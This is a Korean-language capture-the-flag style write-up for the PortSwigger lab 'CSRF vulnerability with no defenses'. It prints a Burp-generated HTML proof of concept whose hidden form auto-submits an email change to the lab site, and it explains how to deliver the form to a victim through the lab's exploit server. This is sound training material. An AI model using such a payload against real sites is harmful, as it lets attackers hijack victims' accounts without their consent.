Lab: CSRF vulnerability with no defenses 문제 풀이(WriteUp)

WEB hacking/PortSwigger

Lab: CSRF vulnerability with no defenses 문제 풀이(WriteUp)

Roronoa 2025. 6. 7. 00:23

문제 설명

CSRF를 이용하여 email을 변경하면 되는 문제이다.

문제 풀이

로그인 후 My Account 페이지에서 email을 변경할 수 있다.

email 파라미터에 다른 email으로 설정한 후 burp suite pro에서 우클릭 > Engagement tools > Generate CSRF POC 버튼을 클릭한다.

CSRF POC가 html 형식으로 생성되며 Test in browser로 테스트가 가능하다.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a740049039866ad81e17a5a00cd00fb.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener2&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Go to exploit server에 접근한 후 CSRF POC 코드를 삽입하고 Deliver exploit to victim 버튼을 클릭한다.

CSRF POC를 전송하면 문제가 해결되었다는 화면이 나온다.

'WEB hacking > PortSwigger' 카테고리의 다른 글

Lab: CSRF where token validation depends on token being present 문제 풀이(WriteUp) (0)	2025.06.09
Lab: CSRF where token validation depends on request method 문제 풀이(WriteUp) (0)	2025.06.08
Lab: Blind OS command injection with out-of-band data exfiltration 문제 풀이(WriteUp) (0)	2025.02.17
Lab: Blind OS command injection with out-of-band interaction 문제 풀이(WriteUp) (0)	2025.02.16
Lab: Blind OS command injection with output redirection 문제 풀이(WriteUp) (0)	2025.02.15

현재글Lab: CSRF vulnerability with no defenses 문제 풀이(WriteUp)

Roronoa

1. Wargame 문제들을 풀어보고 풀이는 공유하는 블로그입니다. 2. 해킹 우회기법 및 스킬을 공유하는 블로그입니다. 3. 취약점 분석 및 익스플로잇 방법 들을 공유하는 블로그입니다.

tryhackme, CSRF, DreamHack, SQL Injection, 해킹, 워 게임, SQL 인젝션, 웹 해킹, 드림핵, 시스템해킹, 버퍼오버플로우, 취약점, wargame, XSS, 워게임, CTF, 웹, writeup, 웹해킹, FTZ,

Today :
Yesterday :

일	월	화	수	목	금	토
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30

Roronoa